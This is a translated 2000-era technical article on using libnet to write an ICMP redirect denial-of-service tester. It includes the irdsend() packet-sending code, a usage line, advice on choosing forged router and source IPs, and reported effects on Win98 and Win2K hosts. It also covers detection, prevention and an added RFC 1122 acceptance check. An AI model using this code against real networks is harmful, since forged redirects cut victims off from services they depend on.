Example of LIBNET (6)
2000-01-01
SCZ
Technical documentation
Date: 2000-07-31 15:01
This article uses libnet to write a program for testing ICMP redirect attacks. First, look at the function involved:
int libnet_build_icmp_redirect(u_char type, u_char code, u_long gateway, u_short orig_len,
                               u_char orig_tos, u_short orig_id, u_short orig_frag,
                               u_char orig_ttl, u_char orig_prot, u_long orig_src,
                               u_long orig_dst, const u_char *orig_payload,
                               int orig_payload_s, u_char *buf);
There is a macro definition in /usr/include/libnet/libnet-headers.h:
#define ICMP_REDIRECT 5
The first parameter, type, can only take this value. The second parameter, code, has four possible values, but for a DoS attack it can only be set to ICMP_UNREACH_HOST (1). Unfortunately the macro name does not match its meaning: the code has nothing to do with whether the target host is reachable. It actually means "redirect datagrams for this host only" (a host redirect); network redirects have been deprecated. gateway specifies the router IP that the victim should use for that host from now on, for example the 192.168.8.90 mentioned in <>, which will show up in the routing table of 192.168.10.60. Strangely, this argument is taken in little-endian order, while all the address arguments that follow are in big-endian (network) order; an oversight in the implementation cannot be ruled out. On i386/Linux little-endian is the host byte order, so take care to convert it when programming.
orig_len is set to 0. In fact, from my experiments this value is not used by libnet_build_icmp_redirect() at all, so I simply set it to 0. The IP header generated in the ICMP data area is fixed at 20 bytes and its total-length field is also fixed at 20, which means no payload follows; the prototype is misleading in this respect. orig_tos is set to 0, orig_id is chosen at random, orig_frag is set to 0, orig_ttl to 255 and orig_prot to IPPROTO_ICMP (1). orig_src, in big-endian order, is the "attack target" IP, for example the 192.168.10.60 mentioned in <>. orig_dst, also in big-endian order, is the "service target" IP whose reachability is to be cut off, for example the 202.99.11.161 mentioned in <>; the host route that gets created is for this IP. orig_payload is set to NULL and orig_payload_s to 0. buf points to an allocated data area; the ICMP header starts at this pointer.
How to set the parameters from orig_len onwards I decided purely from the standpoint of keeping the program simple. Set as above, you can ignore these fields entirely, but you must clearly understand the meaning of every parameter you specify. It is best to capture the packets your program sends with NetXray and check the Decode pane.
Two checksum computations are involved. libnet_do_checksum() is still used to compute the ICMP checksum, and that one is mandatory. The other is the checksum of the IP header inside the ICMP data area; if you leave it out, that checksum decodes as "no checksum". This is not wrong and the packet works just as well, but it feels sloppy, so I compute it anyway, with the same call:
libnet_do_checksum(packet + LIBNET_IP_H + LIBNET_ICMP_REDIRECT_H, IPPROTO_IP, LIBNET_IP_H);
This call fills in the checksum of the IP header inside the ICMP data area on its own.
As the earlier analysis showed, to launch an ICMP redirect attack across a WAN you need to know at least the victim's IP, the victim's current router IP (the forged source must be it, because of the acceptance rules) and the subnet mask (so you can forge a plausible new router IP). The victim IP needs no explanation, the current router IP is somewhat harder to obtain, and the subnet mask can generally be assumed to be class C or even smaller. How to obtain this information efficiently is left to the reader; consider combining it with the traceroute command.
The program takes: the forged source IP (cannot be randomized; must be the current router), the attack target IP, the starting service target IP (can be randomized), the number of service target IPs, the forged router IP (cannot be randomized; must be on the directly connected network), and the number of ICMP redirect messages. No port is involved, and a range of target IPs is no longer allowed, only a single target IP; this follows from how the attack is actually used.
How do you detect and prevent an ICMP redirect attack? Looking at the routing table is the most direct way. netstat -s also reveals an ICMP redirect attack, even one that failed, because the redirect counter goes up and it is normally very small. Protocol analyzers, IDSs and so on can easily spot the attempt. Use a firewall to limit ICMP redirect packets, or modify the system itself to block ICMP redirect messages as the situation requires.
For PWIN98, Yuan Ge provides a very simple method: patch VIP.386. Search with UltraEdit for 83 F9 11 77 08 and change it to 83 F9 00 75 08, which means that if the received ICMP packet is not an ICMP echo reply, jump to the error handling (the original bytes are cmp ecx, 11h / ja +8, rejecting ICMP types above 17; the patched bytes are cmp ecx, 0 / jne +8, so only type 0, echo reply, gets through). When I tested today I forgot that I had patched VIP.386 and wondered why the program was not working.
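The following standalone C program is an added example, not code from this article or from libnet. It lays out an ICMP host redirect byte by byte the way the parameters above describe, computes the quoted IP header checksum and the ICMP checksum with a plain RFC 1071 routine, parses such a message the way a detector or IDS would (type, code, both checksums), and applies the RFC 1122 acceptance rule that is the reason the forged source must be the current router and the forged router IP must be on the victim's subnet. The function and struct names are mine; the addresses reuse the article's 192.168.8.90, 192.168.10.60, 202.99.11.161 and 192.168.0.1, and the 8 quoted bytes of "original datagram" are a constructed ICMP echo header.

```c
/* Added example (not from the article or libnet): build, parse and vet an ICMP host
 * redirect by hand. Addresses and the quoted 8 bytes below are constructed input. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define ICMP_REDIRECT_TYPE 5
#define ICMP_REDIRECT_HOST 1   /* code 1: redirect datagrams for the host */
#define ICMP_REDIRECT_H    8   /* type, code, checksum, gateway */
#define IP_H               20  /* quoted IP header, no options */
#define ORIG_DATA          8   /* first 8 bytes of the quoted datagram */
#define REDIRECT_LEN (ICMP_REDIRECT_H + IP_H + ORIG_DATA)   /* 36 bytes */

/* RFC 1071 checksum; over a block whose checksum field is already set it returns 0 */
uint16_t in_cksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, data += 2)
        sum += (uint32_t)((data[0] << 8) | data[1]);
    if (len)
        sum += (uint32_t)(data[0] << 8);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Host-order values go on the wire big-endian; writing the bytes by hand avoids the
 * ntohl()/htonl() surprise the article describes for libnet's gateway argument. */
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)(v & 0xff); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)(v & 0xffff)); }
static uint32_t get32(const uint8_t *p) { return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3]; }

/* Write a host redirect (type 5, code 1) into buf; returns its length */
size_t build_icmp_redirect(uint8_t *buf, uint32_t gateway, uint32_t orig_src,
                           uint32_t orig_dst, uint8_t orig_prot, const uint8_t orig_data[ORIG_DATA])
{
    uint8_t *ip = buf + ICMP_REDIRECT_H;
    memset(buf, 0, REDIRECT_LEN);
    buf[0] = ICMP_REDIRECT_TYPE;
    buf[1] = ICMP_REDIRECT_HOST;
    put32(buf + 4, gateway);                     /* new first hop for orig_dst */
    ip[0] = 0x45;                                /* IPv4, IHL 5 */
    put16(ip + 2, IP_H + ORIG_DATA);             /* length of the quoted datagram */
    ip[8] = 255;                                 /* TTL */
    ip[9] = orig_prot;
    put32(ip + 12, orig_src);                    /* the host being redirected */
    put32(ip + 16, orig_dst);                    /* destination whose route changes */
    put16(ip + 10, in_cksum(ip, IP_H));          /* quoted IP header checksum */
    memcpy(ip + IP_H, orig_data, ORIG_DATA);
    put16(buf + 2, in_cksum(buf, REDIRECT_LEN)); /* ICMP checksum, computed last */
    return REDIRECT_LEN;
}

struct redirect_info { uint32_t gateway, orig_src, orig_dst; uint8_t code, orig_prot; };

/* Detector-style parse: returns 1 and fills *out for a well-formed redirect, else 0 */
int parse_icmp_redirect(const uint8_t *buf, size_t len, struct redirect_info *out)
{
    const uint8_t *ip = buf + ICMP_REDIRECT_H;
    size_t ihl;
    if (len < REDIRECT_LEN) return 0;                          /* RFC 792 minimum */
    if (buf[0] != ICMP_REDIRECT_TYPE || buf[1] > 3) return 0;  /* codes 0..3 only */
    if (in_cksum(buf, len) != 0) return 0;                     /* ICMP checksum */
    ihl = (size_t)(ip[0] & 0x0f) * 4;
    if ((ip[0] >> 4) != 4 || ihl < IP_H || ICMP_REDIRECT_H + ihl > len) return 0;
    if (in_cksum(ip, ihl) != 0) return 0;                      /* quoted header checksum */
    out->code = buf[1];
    out->gateway = get32(buf + 4);
    out->orig_prot = ip[9];
    out->orig_src = get32(ip + 12);
    out->orig_dst = get32(ip + 16);
    return 1;
}

/* RFC 1122 3.2.2.2: accept only from the current first-hop router, and only a gateway
 * on the directly connected subnet. The quoted-source and not-myself tests are extra
 * sanity checks. pkt_src is the IP source address of the redirect packet itself. */
int redirect_acceptable(uint32_t pkt_src, const struct redirect_info *r,
                        uint32_t my_ip, uint32_t netmask, uint32_t current_gw)
{
    if (pkt_src != current_gw) return 0;
    if (r->orig_src != my_ip) return 0;
    if ((r->gateway & netmask) != (my_ip & netmask)) return 0;
    if (r->gateway == my_ip) return 0;
    return 1;
}

int main(void)
{
    static const uint8_t echo[ORIG_DATA] = { 8, 0, 0, 0, 0, 1, 0, 1 }; /* constructed */
    uint8_t pkt[REDIRECT_LEN];
    struct redirect_info ri;
    size_t i, n = build_icmp_redirect(pkt, 0xC0A8085Au, 0xC0A80A3Cu, 0xCA630BA1u, 1, echo);
    for (i = 0; i < n; i++) printf("%02x%c", (unsigned)pkt[i], i % 16 == 15 ? '\n' : ' ');
    printf("\nparsed=%d\n", parse_icmp_redirect(pkt, n, &ri));
    return 0;
}
```

With the article's addresses, a redirect from 192.168.0.1 naming 192.168.8.90 as the new router is rejected by redirect_acceptable() when 192.168.10.60 has a /24 mask, because 192.168.8.90 is not on 192.168.10.0/24; with a /16 mask the same packet passes, which is exactly why the attacker needs the victim's subnet mask.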
------------------------------------------------------------------------------
/* The globals packet, rawsocket, packet_size and sczirddatalen are defined
 * elsewhere in the program (not shown in this excerpt). */
#include <libnet.h>

void irdsend(u_long srcip, u_long dstip, u_long svrip, u_long routeip, u_long irdnumber)
{
    u_long i;

    /* build the IP header */
    libnet_build_ip(LIBNET_ICMP_REDIRECT_H + LIBNET_IP_H + sczirddatalen, /* length of the IP data area */
                    IPTOS_LOWDELAY,      /* IP TOS */
                    (u_short)random(),   /* IP ID */
                    0,                   /* frag stuff */
                    255,                 /* TTL */
                    IPPROTO_ICMP,        /* upper-layer protocol */
                    srcip,               /* source IP, big-endian order */
                    dstip,               /* target IP */
                    NULL,                /* no options */
                    0,                   /* option length zero */
                    packet);             /* points to the IP header */

    /* build the ICMP redirect header */
    libnet_build_icmp_redirect(ICMP_REDIRECT,       /* type */
                               ICMP_UNREACH_HOST,   /* code */
                               /* little-endian order is used here, strangely; possibly an
                                * oversight in libnet. For i386/Linux this is the host byte order. */
                               ntohl(routeip),      /* forged router IP */
                               0,                   /* orig_len, value is arbitrary */
                               0,                   /* orig_tos */
                               (u_short)random(),   /* orig_id */
                               0,                   /* orig_frag */
                               255,                 /* orig_ttl */
                               IPPROTO_ICMP,        /* orig_prot */
                               dstip,               /* orig_src: make sure you understand this */
                               svrip,               /* orig_dst: the service target being cut off */
                               NULL,                /* orig_payload */
                               0,                   /* orig_payload_s */
                               packet + LIBNET_IP_H); /* points to the ICMP header */

    /* Checksum of the IP header inside the ICMP data area. If it is not computed, that
     * checksum decodes as "no checksum"; this is not wrong and works just as well, but it
     * feels sloppy, so compute it anyway. */
    libnet_do_checksum(packet + LIBNET_IP_H + LIBNET_ICMP_REDIRECT_H, IPPROTO_IP, LIBNET_IP_H);

    /* Note that the ICMP checksum must be computed only after the whole ICMP packet is
     * complete; in our program part of the data is filled in ahead of time.
     * The outer IP header checksum is computed by the kernel. */
    libnet_do_checksum(packet, IPPROTO_ICMP,
                       LIBNET_ICMP_REDIRECT_H + LIBNET_IP_H + sczirddatalen);

    for (i = 0; i < irdnumber; i++)
    {
        /* send the ICMP redirect message */
        libnet_write_ip(rawsocket, packet, packet_size);
    } /* end of for */
    return;
} /* end of irdsend */
------------------------------------------------------------------------------

Usage: ./ir [--si srcip] [--di dstip] [--svr svrip] [--svrnum svrnumber] [--routeip routeip] [--num irdnumber]

Something I learned when choosing routeip: since this is a DoS, try not to choose an active IP. If you must choose an active one, avoid one with IP forwarding enabled, otherwise it may send a legitimate ICMP redirect that corrects the route.

If the victim is Win98, use its own IP as routeip. The entry is deleted, but route selection is still affected, costing memory and routing table lookup time. No hang was observed, and the machine in fact still had Internet access; after a reboot it returns to normal.

For Win2K, routeip can only be set to an inactive IP on the same subnet; it cannot be set to the host itself, and other cases have not been tried. What has been established so far is that the attack does cut off its Internet access. The following restores it:

route -f add 0.0.0.0 mask 0.0.0.0 192.168.0.1

This returns things to normal, but CPU usage hits 100% during the refresh.

SPARC/Solaris 2.6/2.7 and i386/Linux are basically unaffected by ICMP redirect packets. That statement is not quite right either; do the following experiment:

route change default 192.168.8.90
ping -v 203.207.119.8
netstat -nr

Destination      Gateway          Flags  Ref  Use
---------------  ---------------  -----  ---  ---
203.207.119.8    192.168.0.1      UGHD   0    0     <- took effect
default          192.168.8.90     UG     0    98

route delete host 203.207.119.8 192.168.0.1
ndd /dev/ip \?
ndd -get /dev/ip ip_ignore_redirect
ndd -set /dev/ip ip_ignore_redirect 1
ping -v 203.207.119.8
netstat -nr

Compare the results before and after.
Solaris must apply stricter checks. On 8.90 I used NetXray to capture the legitimate ICMP redirect that the Win98 box's routing function sends automatically, then immediately deleted the host route that had just been added on 10.7 and re-sent the captured redirect from NetXray; it had no effect. What the rule is, is not clear. For Linux, do the following experiment:

route del -net 0.0.0.0 gw 192.168.0.1
route add -net 0.0.0.0 gw 192.168.8.90
ping -v 203.207.119.8
netstat -nr

Linux seems to be cooler than Solaris: it simply does not follow the RFC and ignores ICMP redirect packets.

Note: